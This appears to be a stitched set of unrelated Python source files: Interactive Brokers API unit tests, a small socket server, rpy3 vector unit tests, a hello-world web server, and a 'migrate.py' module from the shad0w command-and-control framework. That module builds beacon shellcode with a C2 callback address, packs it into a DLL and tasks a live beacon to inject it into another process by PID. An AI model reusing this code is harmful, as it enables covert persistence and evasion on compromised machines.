client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
cls._client = _client.IBClient(cls._wrapper)
cls._client.connect(utils.IB_HOST, utils.IB_PORT, utils.IB_CLIENT_ID)
thread = threading.Thread(target=cls._client.run)
thread.start()
def setUp(self):
self._orders_manager = self._wrapper.orders_manager
@utils.async_test
async def test_open_order(self):
"""Test overridden function `openOrder`."""
order_id = await self._client.req_next_order_id()
self._client.placeOrder(
orderId=order_id, contract=sample_contracts.gbp_usd_fx(),
order=sample_orders.mkt(order_id=order_id,
action=datatype.OrderAction.BUY)
)
await asyncio.sleep(1)
self.assertTrue(order_id in self._orders_manager.open_orders)
@utils.async_test
async def test_open_order_end(self):
"""Test overridden function `openOrderEnd`."""
queue = self._wrapper.get_request_queue(req_id=_global.IDX_OPEN_ORDERS)
self._client.reqOpenOrders()
await queue.get()
self.assertTrue(queue.finished)
@utils.async_test
async def test_order_status(self):
"""Test overridden function `orderStatus`."""
order_id = await self._client.req_next_order_id()
self._client.placeOrder(
orderId=order_id, contract=sample_contracts.gbp_usd_fx(),
order=sample_orders.mkt(order_id=order_id,
action=datatype.OrderAction.SELL)
)
await asyncio.sleep(1)
self.assertTrue(self._orders_manager.open_orders[order_id].exec_rec)
@classmethod
def tearDownClass(cls):
cls._client.disconnect()
class TestContract(unittest.TestCase):
"""Unit tests for IB contract related functions in `IBWrapper`.
Connection with IB is REQUIRED.
"""
@classmethod
def setUpClass(cls):
cls._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
cls._client = _client.IBClient(cls._wrapper)
cls._client.connect(utils.IB_HOST, utils.IB_PORT, utils.IB_CLIENT_ID)
thread = threading.Thread(target=cls._client.run)
thread.start()
@utils.async_test
async def test_contract_details(self):
"""Test overridden function `contractDetails`.
* `contractDetailsEnd` will be invoked after `contractDetails`.
"""
req_id = self._wrapper.next_req_id
queue = self._wrapper.get_request_queue(req_id)
self._client.reqContractDetails(reqId=req_id,
contract=sample_contracts.gbp_usd_fx())
await asyncio.sleep(0.5)
result = await queue.get()
self.assertTrue(result) # Expect item from queue
# Expect the resolved `ContractDetails` object to be returned
self.assertIsInstance(result[0], contract.ContractDetails)
@utils.async_test
async def test_contract_details_end(self):
"""Test overridden function `contractDetailsEnd`."""
req_id = self._wrapper.next_req_id
queue = self._wrapper.get_request_queue(req_id)
self._wrapper.contractDetailsEnd(reqId=req_id)
await queue.get()
self.assertTrue(queue.finished) # Expect the queue to be marked as FINISHED
@classmethod
def tearDownClass(cls):
cls._client.disconnect()
class TestHistoricalData(unittest.TestCase):
"""Unit tests for historical market data related functions in `IBWrapper`.
Connection with IB is REQUIRED.
"""
@classmethod
def setUpClass(cls):
cls._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
cls._client = _client.IBClient(cls._wrapper)
cls._client.connect(utils.IB_HOST, utils.IB_PORT, utils.IB_CLIENT_ID)
thread = threading.Thread(target=cls._client.run)
thread.start()
def setUp(self):
self._req_id = self._wrapper.next_req_id
self._queue = self._wrapper.get_request_queue(req_id=self._req_id)
@utils.async_test
async def test_head_timestamp(self):
"""Test overridden function `headTimestamp`."""
timestamp = "1110342600" # Unix timestamp
# Mock timestamp received from IB
self._wrapper.headTimestamp(reqId=self._req_id, headTimestamp=timestamp)
result = await self._queue.get()
self.assertTrue(result) # Expect item from queue
self.assertEqual(result[0], timestamp) # Expect data received as-is
# Expect queue to be marked as FINISHED
self.assertTrue(self._queue.finished)
@utils.async_test
async def test_historical_ticks(self):
"""Test overridden function `historicalTicks`."""
end = (datetime.datetime.now().astimezone(_global.TZ)
.strftime(_global.TIME_FMT))
self._client.reqHistoricalTicks(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
startDateTime="", endDateTime=end, numberOfTicks=1000,
whatToShow=datatype.HistoricalTicks.MIDPOINT.value, useRth=1,
ignoreSize=False, miscOptions=[]
)
result = await self._queue.get()
self.assertTrue(result) # Expect item from queue
# Expect `ListOfHistoricalTick` to be sent to the queue
self.assertIsInstance(result[0], wrapper.ListOfHistoricalTick)
# Expect queue to be marked as FINISHED
self.assertTrue(self._queue.finished)
@utils.async_test
async def test_historical_ticks_bid_ask(self):
"""Test overridden function `historicalTicksBidAsk`."""
end = (datetime.datetime.now().astimezone(_global.TZ)
.strftime(_global.TIME_FMT))
self._client.reqHistoricalTicks(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
startDateTime="", endDateTime=end, numberOfTicks=1000,
whatToShow=datatype.HistoricalTicks.BID_ASK.value, useRth=1,
ignoreSize=False, miscOptions=[]
)
result = await self._queue.get()
self.assertTrue(result) # Expect item from queue
# Expect `ListOfHistoricalTick` to be sent to the queue
self.assertIsInstance(result[0], wrapper.ListOfHistoricalTickBidAsk)
# Expect queue to be marked as FINISHED
self.assertTrue(self._queue.finished)
@utils.async_test
async def test_historical_ticks_last(self):
"""Test overridden function `historicalTicksLast`."""
end = (datetime.datetime.now().astimezone(_global.TZ)
.strftime(_global.TIME_FMT))
self._client.reqHistoricalTicks(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
startDateTime="", endDateTime=end, numberOfTicks=1000,
whatToShow=datatype.HistoricalTicks.TRADES.value, useRth=1,
ignoreSize=False, miscOptions=[]
)
result = await self._queue.get()
self.assertTrue(result) # Expect item from queue
# Expect `ListOfHistoricalTick` to be sent to the queue
self.assertIsInstance(result[0], wrapper.ListOfHistoricalTickLast)
# Expect queue to be marked as FINISHED
self.assertTrue(self._queue.finished)
@classmethod
def tearDownClass(cls):
cls._client.disconnect()
class TestTickByTickData(unittest.TestCase):
"""Unit tests for Tick-by-Tick data related functions in `IBWrapper`.
Connection with IB is REQUIRED.
* Tests in this suit will hang up when the market is closed.
* Subscription of US Futures market data is REQUIRED for some tests.
"""
@classmethod
def setUpClass(cls):
cls._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
cls._client = _client.IBClient(cls._wrapper)
cls._client.connect(utils.IB_HOST, utils.IB_PORT, utils.IB_CLIENT_ID)
thread = threading.Thread(target=cls._client.run)
thread.start()
def setUp(self):
self._received = False # Indicates if tick received
self._req_id = self._wrapper.next_req_id
self._queue = self._wrapper.get_request_queue(req_id=self._req_id)
@utils.async_test
async def test_tick_by_tick_all_last_0(self):
"""Test overridden function `tickByTickAllLast` with tick type `Last`.
"""
self._client.reqTickByTickData(
reqId=self._req_id, contract=sample_contracts.us_future(),
tickType=datatype.LiveTicks.LAST.value, numberOfTicks=0,
ignoreSize=True
)
async for elem in self._queue.stream():
if elem is fq.Status.FINISHED:
continue # Let the async task finish
if not self._received:
# Expect `HistoricalTickLast` to be sent to queue
self.assertIsInstance(elem, wrapper.HistoricalTickLast)
await self._stop_streaming(req_id=self._req_id)
@utils.async_test
async def test_tick_by_tick_all_last_1(self):
"""Test overridden function `tickByTickAllLast` with tick type
`AllLast`.
"""
self._client.reqTickByTickData(
reqId=self._req_id, contract=sample_contracts.us_future(),
tickType=datatype.LiveTicks.ALL_LAST.value, numberOfTicks=0,
ignoreSize=True
)
async for elem in self._queue.stream():
if elem is fq.Status.FINISHED:
continue # Let the async task finish
if not self._received:
# Expect `HistoricalTickLast` to be sent to queue
self.assertIsInstance(elem, wrapper.HistoricalTickLast)
await self._stop_streaming(req_id=self._req_id)
@utils.async_test
async def test_tick_by_tick_bid_ask(self):
"""Test overridden function `tickByTickBidAsk`."""
self._client.reqTickByTickData(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
tickType=datatype.LiveTicks.BID_ASK.value, numberOfTicks=0,
ignoreSize=True
)
async for elem in self._queue.stream():
if elem is fq.Status.FINISHED:
continue # Let the async task finish
if not self._received:
# Expect `HistoricalTickLast` to be sent to queue
self.assertIsInstance(elem, wrapper.HistoricalTickBidAsk)
await self._stop_streaming(req_id=self._req_id)
@utils.async_test
async def test_tick_by_tick_mid_point(self):
"""Test overridden function `tickByTickMidPoint`."""
self._client.reqTickByTickData(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
tickType=datatype.LiveTicks.MIDPOINT.value, numberOfTicks=0,
ignoreSize=True
)
async for elem in self._queue.stream():
if elem is fq.Status.FINISHED:
continue # Let the async task finish
if not self._received:
# Expect `HistoricalTickLast` to be sent to queue
self.assertIsInstance(elem, wrapper.HistoricalTick)
await self._stop_streaming(req_id=self._req_id)
@classmethod
def tearDownClass(cls):
cls._client.disconnect()
async def _stop_streaming(self, req_id: int):
self._received = True
self._client.cancelTickByTickData(reqId=req_id)
await asyncio.sleep(2)
self._queue.put(element=fq.Status.FINISHED)
|
server.py
|
#!/usr/bin/env python
import socket
from threading import Thread
HOST = 'localhost'
PORT = 12345
BUFSIZE = 2014
def client_handle(client_socket):
client_info = str(client_socket.getpeername())
print "Got connection from %s" % client_info
while True:
data = client_socket.recv(BUFSIZE)
if not data:
print 'missed a message!!!'
continue
else:
print data
# admin_message = raw_input('admin says: ')
# if admin_message:
# client_socket.sendall('admin says: ' + admin_message)
# else:
# client_socket.sendall('message received!')
client_socket.sendall('message received from %s!' % client_info)
print 'close %s connection.' % client_info
# client_socket.close()
# define socket type, TCP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set options on the socket.
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((HOST, PORT))
sock.listen(10)
while True:
print 'waiting for connection...'
try:
client_sock, client_addr = sock.accept()
except (KeyboardInterrupt, SystemExit):
raise
except Exception, e:
print 'exception: ', e
continue
t = Thread(target=client_handle, args=[client_sock])
t.setDaemon(1)
t.start()
|
test_SexpVector.py
|
import unittest
import sys
import rpy3.rinterface as ri
ri.initr()
def evalr(string):
rstring = ri.StrSexpVector((string, ))
res = ri.baseenv["parse"](text = rstring)
res = ri.baseenv["eval"](res)
return res
def floatEqual(x, y, epsilon = 0.00000001):
return abs(x - y) < epsilon
class WrapperSexpVectorTestCase(unittest.TestCase):
def testInt(self):
sexp = ri.IntSexpVector([1, ])
isInteger = ri.globalenv.get("is.integer")
ok = isInteger(sexp)[0]
self.assertTrue(ok)
def testFloat(self):
sexp = ri.IntSexpVector([1.0, ])
isNumeric = ri.globalenv.get("is.numeric")
ok = isNumeric(sexp)[0]
self.assertTrue(ok)
def testStr(self):
sexp = ri.StrSexpVector(["a", ])
isStr = ri.globalenv.get("is.character")
ok = isStr(sexp)[0]
self.assertTrue(ok)
def testBool(self):
sexp = ri.BoolSexpVector([True, ])
isBool = ri.globalenv.get("is.logical")
ok = isBool(sexp)[0]
self.assertTrue(ok)
def testComplex(self):
sexp = ri.ComplexSexpVector([1+2j, ])
is_complex = ri.globalenv.get("is.complex")
ok = is_complex(sexp)[0]
self.assertTrue(ok)
class NAValuesTestCase(unittest.TestCase):
def testRtoNAInteger(self):
na_int = ri.NAIntegerType()
r_na_int = evalr("NA_integer_")[0]
self.assertTrue(r_na_int is na_int)
def testNAIntegertoR(self):
na_int = ri.NAIntegerType()
self.assertEquals(True, ri.baseenv["is.na"](na_int)[0])
def testNAIntegerBinaryfunc(self):
na_int = ri.NAIntegerType()
self.assertTrue((na_int + 2) is na_int)
def testNAIntegerInVector(self):
na_int = ri.NAIntegerType()
x = ri.IntSexpVector((1, na_int, 2))
self.assertTrue(x[1] is na_int)
self.assertEquals(1, x[0])
self.assertEquals(2, x[2])
def testNAIntegerRepr(self):
na_int = ri.NAIntegerType()
self.assertEquals("NA_integer_", repr(na_int))
def testRtoNALogical(self):
na_lgl = ri.NALogicalType()
r_na_lgl = evalr("NA")[0]
self.assertTrue(r_na_lgl is na_lgl)
def testNALogicaltoR(self):
na_lgl = ri.NALogicalType()
self.assertEquals(True, ri.baseenv["is.na"](na_lgl)[0])
def testNALogicalInVector(self):
na_bool = ri.NALogicalType()
x = ri.BoolSexpVector((True, na_bool, False))
self.assertTrue(x[1] is na_bool)
self.assertEquals(True, x[0])
self.assertEquals(False, x[2])
def testNAIntegerRepr(self):
na_bool = ri.NALogicalType()
self.assertEquals("NA", repr(na_bool))
def testRtoNAReal(self):
na_real = ri.NARealType()
r_na_real = evalr("NA_real_")[0]
self.assertTrue(r_na_real is na_real)
def testNARealtoR(self):
na_real = ri.NARealType()
self.assertEquals(True, ri.baseenv["is.na"](na_real)[0])
def testNARealBinaryfunc(self):
na_real = ri.NARealType()
self.assertTrue((na_real + 2.0) is na_real)
def testNARealInVector(self):
na_float = ri.NARealType()
x = ri.FloatSexpVector((1.1, na_float, 2.2))
self.assertTrue(x[1] is na_float)
self.assertEquals(1.1, x[0])
self.assertEquals(2.2, x[2])
def testNARealRepr(self):
na_float = ri.NARealType()
self.assertEquals("NA_real_", repr(na_float))
def testRtoNACharacter(self):
na_character = ri.NACharacterType()
r_na_character = evalr("NA_character_")[0]
self.assertTrue(r_na_character is na_character)
def testNACharactertoR(self):
na_character = ri.NACharacterType()
self.assertEquals(True, ri.baseenv["is.na"](ri.StrSexpVector((na_character, )))[0])
def testNACharacterInVector(self):
na_str = ri.NACharacterType()
x = ri.StrSexpVector(("ab", na_str, "cd"))
self.assertTrue(x[1] is na_str)
self.assertEquals("ab", x[0])
self.assertEquals("cd", x[2])
def testNACharacterRepr(self):
na_str = ri.NACharacterType()
self.assertEquals("NA_character_", repr(na_str))
class SexpVectorTestCase(unittest.TestCase):
def testMissinfType(self):
self.assertRaises(ValueError, ri.SexpVector, [2, ])
#FIXME: end and initializing again causes currently a lot a trouble...
def testNewWithoutInit(self):
if sys.version_info[0] == 2 and sys.version_info[1] < 6:
self.assertTrue(False) # cannot be tested with Python < 2.6
return None
import multiprocessing
def foo(queue):
import rpy3.rinterface as rinterface
rinterface.endr(1)
try:
tmp = ri.SexpVector([1,2], ri.INTSXP)
res = (False, None)
except RuntimeError, re:
res = (True, re)
except Exception, e:
res = (False, e)
queue.put(res)
q = multiprocessing.Queue()
p = multiprocessing.Process(target = foo, args = (q,))
p.start()
res = q.get()
p.join()
self.assertTrue(res[0])
def testNewBool(self):
sexp = ri.SexpVector([True, ], ri.LGLSXP)
isLogical = ri.globalenv.get("is.logical")
ok = isLogical(sexp)[0]
self.assertTrue(ok)
self.assertTrue(sexp[0])
sexp = ri.SexpVector(["a", ], ri.LGLSXP)
isLogical = ri.globalenv.get("is.logical")
ok = isLogical(sexp)[0]
self.assertTrue(ok)
self.assertTrue(sexp[0])
def testNewInt(self):
sexp = ri.SexpVector([1, ], ri.INTSXP)
isInteger = ri.globalenv.get("is.integer")
ok = isInteger(sexp)[0]
self.assertTrue(ok)
sexp = ri.SexpVector(["a", ], ri.INTSXP)
isNA = ri.globalenv.get("is.na")
ok = isNA(sexp)[0]
self.assertTrue(ok)
def testNewReal(self):
sexp = ri.SexpVector([1.0, ], ri.REALSXP)
isNumeric = ri.globalenv.get("is.numeric")
ok = isNumeric(sexp)[0]
self.assertTrue(ok)
sexp = ri.SexpVector(["a", ], ri.REALSXP)
isNA = ri.globalenv.get("is.na")
ok = isNA(sexp)[0]
self.assertTrue(ok)
def testNewComplex(self):
sexp = ri.SexpVector([1.0 + 1.0j, ], ri.CPLXSXP)
isComplex = ri.globalenv.get("is.complex")
ok = isComplex(sexp)[0]
self.assertTrue(ok)
def testNewString(self):
sexp = ri.SexpVector(["abc", ], ri.STRSXP)
isCharacter = ri.globalenv.get("is.character")
ok = isCharacter(sexp)[0]
self.assertTrue(ok)
sexp = ri.SexpVector([1, ], ri.STRSXP)
isCharacter = ri.globalenv.get("is.character")
ok = isCharacter(sexp)[0]
self.assertTrue(ok)
def testNewUnicode(self):
sexp = ri.SexpVector([u'abc', ], ri.STRSXP)
isCharacter = ri.globalenv.get("is.character")
ok = isCharacter(sexp)[0]
self.assertTrue(ok)
self.assertEquals('abc', sexp[0])
def testNewList(self):
vec = ri.ListSexpVector([1,'b',3,'d',5])
ok = ri.baseenv["is.list"](vec)[0]
self.assertTrue(ok)
self.assertEquals(5, len(vec))
self.assertEquals(1, vec[0][0])
self.assertEquals('b', vec[1][0])
def testNewVector(self):
sexp_char = ri.SexpVector(["abc", ],
ri.STRSXP)
sexp_int = ri.SexpVector([1, ],
ri.INTSXP)
sexp = ri.SexpVector([sexp_char, sexp_int],
ri.VECSXP)
isList = ri.globalenv.get("is.list")
ok = isList(sexp)[0]
self.assertTrue(ok)
self.assertEquals(2, len(sexp))
def testNew_InvalidType_NotAType(self):
self.assertRaises(ValueError, ri.SexpVector, [1, ], -1)
self.assertRaises(ValueError, ri.SexpVector, [1, ], 250)
def testNew_InvalidType_NotAVectorType(self):
self.assertRaises(ValueError, ri.SexpVector, [1, ], ri.ENVSXP)
def testNew_InvalidType_NotASequence(self):
self.assertRaises(ValueError, ri.SexpVector, 1, ri.INTSXP)
def testGetItem(self):
letters_R = ri.globalenv.get("letters")
self.assertTrue(isinstance(letters_R, ri.SexpVector))
letters = (('a', 0), ('b', 1), ('c', 2),
('x', 23), ('y', 24), ('z', 25))
for l, i in letters:
self.assertTrue(letters_R[i] == l)
Rlist = ri.globalenv.get("list")
seq_R = ri.globalenv.get("seq")
mySeq = seq_R(ri.SexpVector([0, ], ri.INTSXP),
ri.SexpVector([10, ], ri.INTSXP))
myList = Rlist(s=mySeq, l=letters_R)
idem = ri.globalenv.get("identical")
self.assertTrue(idem(mySeq, myList[0]))
self.assertTrue(idem(letters_R, myList[1]))
letters_R = ri.globalenv.get("letters")
self.assertEquals('z', letters_R[-1])
def testGetItemLang(self):
formula = ri.baseenv.get('formula')
f = formula(ri.StrSexpVector(['y ~ x', ]))
y = f[0]
self.assertEquals(ri.SYMSXP, y.typeof)
def testGetItemExpression(self):
expression = ri.baseenv.get('expression')
e = expression(ri.StrSexpVector(['a', ]),
ri.StrSexpVector(['b', ]))
y = e[0]
self.assertEquals(ri.STRSXP, y.typeof)
def testGetItemPairList(self):
pairlist = ri.baseenv.get('pairlist')
pl = pairlist(a = ri.StrSexpVector([1, ]))
y = pl[0]
self.assertEquals(ri.LISTSXP, y.typeof)
def testGetItemNegativeOutOfBound(self):
letters_R = ri.globalenv.get("letters")
self.assertRaises(IndexError, letters_R.__getitem__,
-100)
def testGetItemOutOfBound(self):
myVec = ri.SexpVector([0, 1, 2, 3, 4, 5], ri.INTSXP)
self.assertRaises(IndexError, myVec.__getitem__, 10)
if (sys.maxint > ri.R_LEN_T_MAX):
self.assertRaises(IndexError, myVec.__getitem__,
ri.R_LEN_T_MAX+1)
def testGetSliceFloat(self):
vec = ri.FloatSexpVector([1.0,2.0,3.0])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(1.0, vec[0])
self.assertEquals(2.0, vec[1])
def testGetSliceInt(self):
vec = ri.IntSexpVector([1,2,3])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(1, vec[0])
self.assertEquals(2, vec[1])
def testGetSliceIntNegative(self):
vec = ri.IntSexpVector([1,2,3])
vec = vec[-2:-1]
self.assertEquals(1, len(vec))
self.assertEquals(2, vec[0])
def testGetSliceBool(self):
vec = ri.BoolSexpVector([True,False,True])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(True, vec[0])
self.assertEquals(False, vec[1])
def testGetSliceStr(self):
vec = ri.StrSexpVector(['a','b','c'])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals('a', vec[0])
self.assertEquals('b', vec[1])
def testGetSliceComplex(self):
vec = ri.ComplexSexpVector([1+2j,2+3j,3+4j])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(1+2j, vec[0])
self.assertEquals(2+3j, vec[1])
def testGetSliceList(self):
vec = ri.ListSexpVector([1,'b',True])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(1, vec[0][0])
self.assertEquals('b', vec[1][0])
def testAssignItemDifferentType(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([0, 1, 2, 3, 4, 5], ri.INTSXP))
self.assertRaises(ValueError, myVec.__setitem__, 0,
ri.SexpVector(["a", ], ri.STRSXP))
def testAssignItemOutOfBound(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([0, 1, 2, 3, 4, 5], ri.INTSXP))
self.assertRaises(IndexError, myVec.__setitem__, 10,
ri.SexpVector([1, ], ri.INTSXP))
def testAssignItemInt(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([0, 1, 2, 3, 4, 5], ri.INTSXP))
myVec[0] = ri.SexpVector([100, ], ri.INTSXP)
self.assertTrue(myVec[0] == 100)
myVec[3] = ri.SexpVector([100, ], ri.INTSXP)
self.assertTrue(myVec[3] == 100)
myVec[-1] = ri.SexpVector([200, ], ri.INTSXP)
self.assertTrue(myVec[5] == 200)
def testAssignItemReal(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([0.0, 1.0, 2.0, 3.0, 4.0, 5.0],
ri.REALSXP))
myVec[0] = ri.SexpVector([100.0, ], ri.REALSXP)
self.assertTrue(floatEqual(myVec[0], 100.0))
myVec[3] = ri.SexpVector([100.0, ], ri.REALSXP)
self.assertTrue(floatEqual(myVec[3], 100.0))
def testAssignItemLogical(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([True, False, True, True, False],
ri.LGLSXP))
myVec[0] = ri.SexpVector([False, ], ri.LGLSXP)
self.assertFalse(myVec[0])
myVec[3] = ri.SexpVector([False, ], ri.LGLSXP)
self.assertFalse(myVec[3])
def testAssignItemComplex(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([1.0+2.0j, 2.0+2.0j, 3.0+2.0j,
4.0+2.0j, 5.0+2.0j],
ri.CPLXSXP))
myVec[0] = ri.SexpVector([100.0+200.0j, ], ri.CPLXSXP)
self.assertTrue(floatEqual(myVec[0].real, 100.0))
self.assertTrue(floatEqual(myVec[0].imag, 200.0))
myVec[3] = ri.SexpVector([100.0+200.0j, ], ri.CPLXSXP)
self.assertTrue(floatEqual(myVec[3].real, 100.0))
self.assertTrue(floatEqual(myVec[3].imag, 200.0))
def testAssignItemList(self):
myVec = ri.SexpVector([ri.StrSexpVector(["a", ]),
ri.IntSexpVector([1, ]),
ri.IntSexpVector([3, ])],
ri.VECSXP)
myVec[0] = ri.SexpVector([ri.FloatSexpVector([100.0, ]), ],
ri.VECSXP)
self.assertTrue(floatEqual(myVec[0][0][0], 100.0))
myVec[2] = ri.SexpVector([ri.StrSexpVector(["a", ]), ],
ri.VECSXP)
self.assertTrue(myVec[2][0][0] == "a")
def testAssignItemString(self):
letters_R = ri.SexpVector("abcdefghij", ri.STRSXP)
self.assertRaises(ValueError, letters_R.__setitem__, 0,
ri.SexpVector([1, ],
ri.INTSXP))
letters_R[0] = ri.SexpVector(["z", ], ri.STRSXP)
self.assertTrue(letters_R[0] == "z")
def testSetSliceFloat(self):
vec = ri.FloatSexpVector([1.0,2.0,3.0])
vec[0:2] = ri.FloatSexpVector([11.0, 12.0])
self.assertEquals(3, len(vec))
self.assertEquals(11.0, vec[0])
self.assertEquals(12.0, vec[1])
self.assertEquals(3.0, vec[2])
def testSetSliceInt(self):
vec = ri.IntSexpVector([1,2,3])
vec[0:2] = ri.IntSexpVector([11,12])
self.assertEquals(3, len(vec))
self.assertEquals(11, vec[0])
self.assertEquals(12, vec[1])
def testSetSliceIntNegative(self):
vec = ri.IntSexpVector([1,2,3])
vec[-2:-1] = ri.IntSexpVector([33,])
self.assertEquals(3, len(vec))
self.assertEquals(33, vec[1])
def testSetSliceBool(self):
vec = ri.BoolSexpVector([True,False,True])
vec[0:2] = ri.BoolSexpVector([False, False])
self.assertEquals(3, len(vec))
self.assertEquals(False, vec[0])
self.assertEquals(False, vec[1])
def testSetSliceStr(self):
vec = ri.StrSexpVector(['a','b','c'])
vec[0:2] = ri.StrSexpVector(['d','e'])
self.assertEquals(3, len(vec))
self.assertEquals('d', vec[0])
self.assertEquals('e', vec[1])
def testSetSliceComplex(self):
vec = ri.ComplexSexpVector([1+2j,2+3j,3+4j])
vec[0:2] = ri.ComplexSexpVector([11+2j,12+3j])
self.assertEquals(3, len(vec))
self.assertEquals(11+2j, vec[0])
self.assertEquals(12+3j, vec[1])
def testSetSliceList(self):
vec = ri.ListSexpVector([1,'b',True])
vec[0:2] = ri.ListSexpVector([False, 2])
self.assertEquals(3, len(vec))
self.assertEquals(False, vec[0][0])
self.assertEquals(2, vec[1][0])
def testMissingRPreserveObjectBug(self):
rgc = ri.baseenv['gc']
xx = range(100000)
x = ri.SexpVector(xx, ri.INTSXP)
rgc()
self.assertEquals(0, x[0])
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(SexpVectorTestCase)
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(WrapperSexpVectorTestCase))
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(NAValuesTestCase))
return suite
if __name__ == '__main__':
tr = unittest.TextTestRunner(verbosity = 2)
tr.run(suite())
|
migrate.py
|
#
# Migrate the current beacon to a different process
#
import os
import json
import base64
import argparse
import threading
from lib import buildtools
__description__ = "Migrate a beacon to a different process"
__author__ = "@_batsec_"
__type__ = "process"
# identify the task as shellcode execute
DLLINJECT_EXEC_ID = 0x5000
# did the command error
ERROR = False
error_list = ""
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message is not None:
print(message)
def build_inject_info(args, rcode):
# create the json object to tell the beacon
# where to execute the code.
info = {}
info["pid"] = int(args.pid)
info["dll"] = rcode
return json.dumps(info)
def generate_beacon_code(shad0w):
buildtools.clone_source_files(rootdir='injectable')
settings_template = """#define _C2_CALLBACK_ADDRESS L"%s"
#define _C2_CALLBACK_PORT %s
#define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
#define _CALLBACK_JITTER %s000
#define IMPERSONATE_SESSION "%s"
""" % (shad0w.endpoint, shad0w.addr[1], 1, shad0w.current_beacon)
buildtools.update_settings_file(None, custom_template=settings_template)
os = shad0w.beacons[shad0w.current_beacon]["os"]
arch = shad0w.beacons[shad0w.current_beacon]["arch"]
secure = shad0w.beacons[shad0w.current_beacon]["secure"]
buildtools.make_in_clone(arch=arch, platform=os, secure=secure, static=True)
return buildtools.extract_shellcode()
def format_shellcode(shellcode):
hshellcode = ""
code_size = len(shellcode)
for num, byte in enumerate(shellcode):
if num != code_size - 1:
hshellcode += f"{hex(byte)},"
else:
hshellcode += f"{hex(byte)}"
return hshellcode
def write_header(code, file_loc):
hex_code = format_shellcode(code)
TEMPLATE = """unsigned char beacon_bin[] = { %s };
unsigned int beacon_bin_len = %s;
"""
header = TEMPLATE % (hex_code, len(code))
with open(file_loc, 'w') as file:
file.write(header)
return
def get_dll_data(file_loc):
with open(file_loc, "rb") as file:
data = file.read()
return base64.b64encode(data).decode()
def generate_beacon_dll(shad0w, rcode):
# write header file
write_header(rcode, "/root/shad0w/modules/windows/shinject/beacon.h")
# build the dll
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/shinject/", basedir="/root/shad0w/modules/windows/shinject/")
made = buildtools.make_in_clone(modlocation="/root/shad0w/modules/windows/shinject/module.dll", builddir=os.getcwd(), make_target="x64")
# check that the dll has built
if made is not True:
shad0w.debug.error("Error building migrate dll.")
return
# return the base64 dll data
return get_dll_data("/root/shad0w/modules/windows/shinject/module.dll")
def await_impersonate(shad0w, pid):
while True:
if shad0w.beacons[shad0w.current_beacon]["impersonate"] == None:
continue
else:
imp_beacon_id = shad0w.beacons[shad0w.current_beacon]["impersonate"]
shad0w.beacons[shad0w.current_beacon]["task"] = (0x6000, None)
shad0w.debug.log("Tasked beacon to die.", log=True)
shad0w.current_beacon = imp_beacon_id
break
shad0w.debug.good(f"Successfully migrated ({pid})")
return
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# usage examples
usage_examples = """
Examples:
migrate -p 8725
"""
# init argparse
parse = argparse.ArgumentParser(prog='migrate',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# set the args
parse.add_argument("-p", "--pid", required=True, help="PID to migrate to")
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# show the errors to the user
if ERROR:
print(error_list)
parse.print_help()
return
# create the beacon
rcode = generate_beacon_code(shad0w)
# create the beacon dll
rcode = generate_beacon_dll(shad0w, rcode)
# make the json info
inject_info = build_inject_info(args, rcode)
# tell the beacon to execute the dll
shad0w.beacons[shad0w.current_beacon]["task"] = (DLLINJECT_EXEC_ID, inject_info)
# try to impersonate the new beacon
threading.Thread(target=await_impersonate, args=(shad0w, args.pid)).start()
return
|
hello-world-web-server-2.py
|
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
class HelloHTTPRequestHandler(BaseHTTPRequestHandler):
message = 'Hello World! 今日は'
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(self.message.encode('utf-8'))
self.close_connection = True
def serve(addr, port):
with ThreadingHTTPServer((addr, port), HelloHTTPRequestHandler) as server:
server.serve_forever(poll_interval=None)
if __name__ == '__main__':
addr, port = ('localhost', 80)
threading.Thread(target=serve, args=(addr, port), daemon=True).start()
try:
while True:
# handle Ctrl+C
input()
